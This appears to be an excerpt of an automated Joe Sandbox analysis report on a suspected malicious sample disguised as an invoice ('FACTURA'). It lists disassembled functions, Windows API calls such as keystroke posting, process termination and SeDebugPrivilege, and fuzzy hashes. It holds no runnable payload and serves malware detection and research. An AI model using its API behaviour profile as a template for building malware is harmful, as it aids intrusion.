                                                                            • Instruction Fuzzy Hash: B151A131900244BFEB209B25DC85F9D3BA4EB057A2F604116FF51F61A1CF71AD8AEB41
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F0C2F7
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0C319
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F0C331
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F0C34F
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F0C370
                                                                            • DestroyCursor.USER32(00000000), ref: 00F0C37F
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F0C39C
                                                                            • DestroyCursor.USER32(?), ref: 00F0C3AB
                                                                              • Part of subcall function 00F5A4AF: DeleteObject.GDI32(00000000), ref: 00F5A4E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2975913752-0
                                                                            • Opcode ID: 3839d6cc36a5ba03c816e0b85a3c6224b7e139553d50477eaf89c547b4411642
                                                                            • Instruction ID: c0bb2bd0273be20019cd1a87fddfde585f52b31e310fd37541d3c02f6125ee4a
                                                                            • Opcode Fuzzy Hash: 3839d6cc36a5ba03c816e0b85a3c6224b7e139553d50477eaf89c547b4411642
                                                                            • Instruction Fuzzy Hash: F8516E70A10709EFDB20DF64CC45BAA77E5EB54721F10462EFA02A72D0D7B0AD51EB90
                                                                            APIs
                                                                              • Part of subcall function 00F2A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2A84C
                                                                              • Part of subcall function 00F2A82C: GetCurrentThreadId.KERNEL32 ref: 00F2A853
                                                                              • Part of subcall function 00F2A82C: AttachThreadInput.USER32(00000000,?,00F29683,?,00000001), ref: 00F2A85A
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F2968E
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F296AB
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F296AE
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F296B7
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F296D5
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F296D8
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F296E1
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F296F8
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F296FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: 2c5346b8ab5c10150e400a6ab55dd529090fc6be296828b6e0ee65403dbec614
                                                                            • Instruction ID: 9de39db2cc269f1162521432e1cfdff60fd53e177695487b536e18dcd114f454
                                                                            • Opcode Fuzzy Hash: 2c5346b8ab5c10150e400a6ab55dd529090fc6be296828b6e0ee65403dbec614
                                                                            • Instruction Fuzzy Hash: 3911A1B1950618BFF6106F60EC89F6A7F6DEB4C752F110465F344AB0A1C9F25C50EAA4
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00F2892A
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F28931
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F28946
                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00F2894E
                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00F28951
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00F28961
                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00F28969
                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00F2896C
                                                                            • CreateThread.KERNEL32(00000000,00000000,00F28992,00000000,00000000,00000000), ref: 00F28986
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1422014791-0
                                                                            • Opcode ID: d71d1f0de7b5b61047582e69dbd50eb5f99a16cf607d68dad8a910cd36409742
                                                                            • Instruction ID: 786486f8f8891e0b38895635381e60934a72096b1c79d9696e7e884d078f9557
                                                                            • Opcode Fuzzy Hash: d71d1f0de7b5b61047582e69dbd50eb5f99a16cf607d68dad8a910cd36409742
                                                                            • Instruction Fuzzy Hash: B701BBB5240748FFE710ABA5DC4DF6B3BACEB89711F408461FB05DB1A1CA709804DB21
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 785581cff1f3a44efdaf24d2a85784e69717dd9f9dcf9e29f2b1960d951b4d56
                                                                            • Instruction ID: 04260fb2a84360a451f167cc0c2d4bd5f75bf381ee010bde33334c2f860f99d9
                                                                            • Opcode Fuzzy Hash: 785581cff1f3a44efdaf24d2a85784e69717dd9f9dcf9e29f2b1960d951b4d56
                                                                            • Instruction Fuzzy Hash: 2FC17F71F0421A9BDF10DF98D884AAFBBF5EB48314F148469ED05AB281E7B09D45DBA0
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$_memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2862541840-625585964
                                                                            • Opcode ID: 4d55b0e93c287fdd0a4209dba617a7a8ac713917abd06f7d946fbf48b8ba045c
                                                                            • Instruction ID: 349b4d9eaf527f5f76952e69ad34972e3dcb526006da00be02afb16c16701725
                                                                            • Opcode Fuzzy Hash: 4d55b0e93c287fdd0a4209dba617a7a8ac713917abd06f7d946fbf48b8ba045c
                                                                            • Instruction Fuzzy Hash: FB919071E04219ABDF24DFA5CC48FAFBBB8EF45720F108159F915AB281D7B09905DBA0
                                                                            APIs
                                                                              • Part of subcall function 00F2710A: CLSIDFromProgID.COMBASE ref: 00F27127
                                                                              • Part of subcall function 00F2710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F27142
                                                                              • Part of subcall function 00F2710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F27044,80070057,?,?), ref: 00F27150
                                                                              • Part of subcall function 00F2710A: CoTaskMemFree.COMBASE(00000000), ref: 00F27160
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00F49806
                                                                            • _memset.LIBCMT ref: 00F49813
                                                                            • _memset.LIBCMT ref: 00F49956
                                                                            • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00F49982
                                                                            • CoTaskMemFree.COMBASE(?), ref: 00F4998D
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 00F499DB
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 3e2aba92b43b48399e108e95d0bb8b0af3e31ce07b3fedd940c8e1bb8ffaff6b
                                                                            • Instruction ID: 29a1e8e08defe0fcba047de6a88eb49745845bf92f94360572d7cd8ae4c2074b
                                                                            • Opcode Fuzzy Hash: 3e2aba92b43b48399e108e95d0bb8b0af3e31ce07b3fedd940c8e1bb8ffaff6b
                                                                            • Instruction Fuzzy Hash: 87914871D04229EBDB10DFA4DC85EDEBBB9EF08310F10415AF919A7281EB719A45DFA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F56E24
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F56E38
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F56E52
                                                                            • _wcscat.LIBCMT ref: 00F56EAD
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F56EC4
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F56EF2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: c6ba32903f04d6fef4200f4014aa4ea3cfa68d88747c8b2007b3df7dae423079
                                                                            • Instruction ID: e5eb156e4eb050624bfc664b892eccb0e6426e1438024109b37dfa9654ae17fb
                                                                            • Opcode Fuzzy Hash: c6ba32903f04d6fef4200f4014aa4ea3cfa68d88747c8b2007b3df7dae423079
                                                                            • Instruction Fuzzy Hash: CF41C470A00308ABDB219F64CC45BEE77F8EF08361F50046AFA54E7191D7719D899B60
                                                                            APIs
                                                                              • Part of subcall function 00F33C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F33C7A
                                                                              • Part of subcall function 00F33C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F33C88
                                                                              • Part of subcall function 00F33C55: CloseHandle.KERNEL32(00000000), ref: 00F33D52
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4E9A4
                                                                            • GetLastError.KERNEL32 ref: 00F4E9B7
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4E9E6
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4EA63
                                                                            • GetLastError.KERNEL32(00000000), ref: 00F4EA6E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4EAA3
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: aaaaa1d9f996e863c48ca1e11ce1554f4f111ba400fba436f284bb98574cfe9c
                                                                            • Instruction ID: e131339287df3690b08ab3817cd46d8d63190f612a2525766a571751830c8eee
                                                                            • Opcode Fuzzy Hash: aaaaa1d9f996e863c48ca1e11ce1554f4f111ba400fba436f284bb98574cfe9c
                                                                            • Instruction Fuzzy Hash: FC41AD316002059FDB14EF14DC95F6DBBE5BF40714F188459FA429B3D2CB79A809EB91
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00F33033
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            • Opcode ID: 9fb628a90009ec513d16e19d44b75ea0cabb7105f256db79b9efa24ffc3b4ef3
                                                                            • Instruction ID: 5a2255e483c212ac6041c6681b3f8eea1fc3e422ee5b07dacddfafc38138921e
                                                                            • Opcode Fuzzy Hash: 9fb628a90009ec513d16e19d44b75ea0cabb7105f256db79b9efa24ffc3b4ef3
                                                                            • Instruction Fuzzy Hash: 3311EB7274C34ABEE719DA54DC82DAB779C9F15374F20002AFB00A6181DB719F4176A5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F34312
                                                                            • LoadStringW.USER32(00000000), ref: 00F34319
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F3432F
                                                                            • LoadStringW.USER32(00000000), ref: 00F34336
                                                                            • _wprintf.LIBCMT ref: 00F3435C
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3437A
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00F34357
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 3648134473-3128320259
                                                                            • Opcode ID: 06f931074cb853644bf275858341b8d1a814947033b5094ff6dcbb76c32b5b94
                                                                            • Instruction ID: 2973691e5f1ed445b9d92fc1b742cff49005283f32b02eeaa7d355f5242c0bfa
                                                                            • Opcode Fuzzy Hash: 06f931074cb853644bf275858341b8d1a814947033b5094ff6dcbb76c32b5b94
                                                                            • Instruction Fuzzy Hash: 66014FF290030CBFE711A7A0DD89EEB776CDB08311F4005E1BB45E2052EA75AE896B71
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00ED2ACF
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00ED2B17
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00F0C21A
                                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F0C1C7,00000004,00000000,00000000,00000000), ref: 00F0C286
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: 4718f2ce997c43f7b094296833c62c7666ce6982fed4a4b8018ee813dc4d69c2
                                                                            • Instruction ID: 418dd8fad0f06b611e1bc2f02ae74789ef1b661987b6239addf138b1ed63b9f8
                                                                            • Opcode Fuzzy Hash: 4718f2ce997c43f7b094296833c62c7666ce6982fed4a4b8018ee813dc4d69c2
                                                                            • Instruction Fuzzy Hash: DB4148307087809ACB359B28CC8CBAF7B92EB65314F54A91FE347A67A0C6719847F750
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F370DD
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F37114
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00F37130
                                                                            • _memmove.LIBCMT ref: 00F3717E
                                                                            • _memmove.LIBCMT ref: 00F3719B
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00F371AA
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F371BF
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F371DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 256516436-0
                                                                            • Opcode ID: e6cb12ae87abc371416279b00043e7c9030921ee5b40bd96b02b9255ddb09547
                                                                            • Instruction ID: b718438e4608bc418f31ba4641a30a4848afe20da231df53e1dd4d76435b9acd
                                                                            • Opcode Fuzzy Hash: e6cb12ae87abc371416279b00043e7c9030921ee5b40bd96b02b9255ddb09547
                                                                            • Instruction Fuzzy Hash: 13316176900209EBCF10EFA4DC859AFBBB8EF45711F1441B5FA04AB256DB709E14DBA0
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 00F561EB
                                                                            • GetDC.USER32(00000000), ref: 00F561F3
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F561FE
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F5620A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F56246
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F56257
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F5902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F56291
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F562B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 1d2ff3aef39e84addea8533b3102df8ab0b9f64a298d173e611f22399203d93e
                                                                            • Instruction ID: 2633672f313dc4d0a3edd2eb57e32ac9d34ece87fed01c3143d0ab300615ef58
                                                                            • Opcode Fuzzy Hash: 1d2ff3aef39e84addea8533b3102df8ab0b9f64a298d173e611f22399203d93e
                                                                            • Instruction Fuzzy Hash: 5D315C72101214BFEF118F508C8AFAB3BA9EF49766F0440A5FF08DA192C6759845DB60
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 9840b574a6c8bf15b376bcf6ba748677dcdd40a72dabb31535d01db2ccfa122a
                                                                            • Instruction ID: c581ad40d82043ac9b37c06e3f61493883e311f7565db2e9235c5a8f28d72f72
                                                                            • Opcode Fuzzy Hash: 9840b574a6c8bf15b376bcf6ba748677dcdd40a72dabb31535d01db2ccfa122a
                                                                            • Instruction Fuzzy Hash: B3219C71A4162E77E6046611BD42FFB775D9E90378F044020FE0466687EB54DF11B1A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be931bf582bd021c159e7976570e16ad9e39afc91f4f72da5ede64e33d6f5688
                                                                            • Instruction ID: 607f56f80038d6fa2462703e639a6a971254d267e70fa9005f5dd5cf41e4ee40
                                                                            • Opcode Fuzzy Hash: be931bf582bd021c159e7976570e16ad9e39afc91f4f72da5ede64e33d6f5688
                                                                            • Instruction Fuzzy Hash: D1714D30900119FFCB149F98CC45ABEBB79FF85325F14819AF915AB291C734AA52DBA0
                                                                            APIs
                                                                            • IsWindow.USER32(01142618), ref: 00F5B3EB
                                                                            • IsWindowEnabled.USER32(01142618), ref: 00F5B3F7
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F5B4DB
                                                                            • SendMessageW.USER32(01142618,000000B0,?,?), ref: 00F5B512
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00F5B54F
                                                                            • GetWindowLongW.USER32(01142618,000000EC), ref: 00F5B571
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F5B589
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: a501806de07a6dc31c2526f43019af110a43a966698fb9318300cc2a8804ce2a
                                                                            • Instruction ID: 3f644fefe14eca17fb4cf79d88da82bf9f4f385c5df5be972e44a7b38e0912c7
                                                                            • Opcode Fuzzy Hash: a501806de07a6dc31c2526f43019af110a43a966698fb9318300cc2a8804ce2a
                                                                            • Instruction Fuzzy Hash: C3718E34A04608AFDF35DF54C894FBABBA5FF09322F144059EF46972A2C731A949EB50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F4F448
                                                                            • _memset.LIBCMT ref: 00F4F511
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00F4F556
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
                                                                            • GetProcessId.KERNEL32(00000000), ref: 00F4F5CD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4F5FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: b0d8e3c33385c84a1c64d6f15c2cc21ea36a33e50904d86153379d3515a5a5f0
                                                                            • Instruction ID: c2b8b0109cdb16657657a5ef7e88bd8061349534a1479801c64e61deda50a4f1
                                                                            • Opcode Fuzzy Hash: b0d8e3c33385c84a1c64d6f15c2cc21ea36a33e50904d86153379d3515a5a5f0
                                                                            • Instruction Fuzzy Hash: F6617E75E006199FCB14EF64C8819AEBBF5FF49320F14806AE859BB361CB31AD45DB90
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00F30F8C
                                                                            • GetKeyboardState.USER32(?), ref: 00F30FA1
                                                                            • SetKeyboardState.USER32(?), ref: 00F31002
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F31030
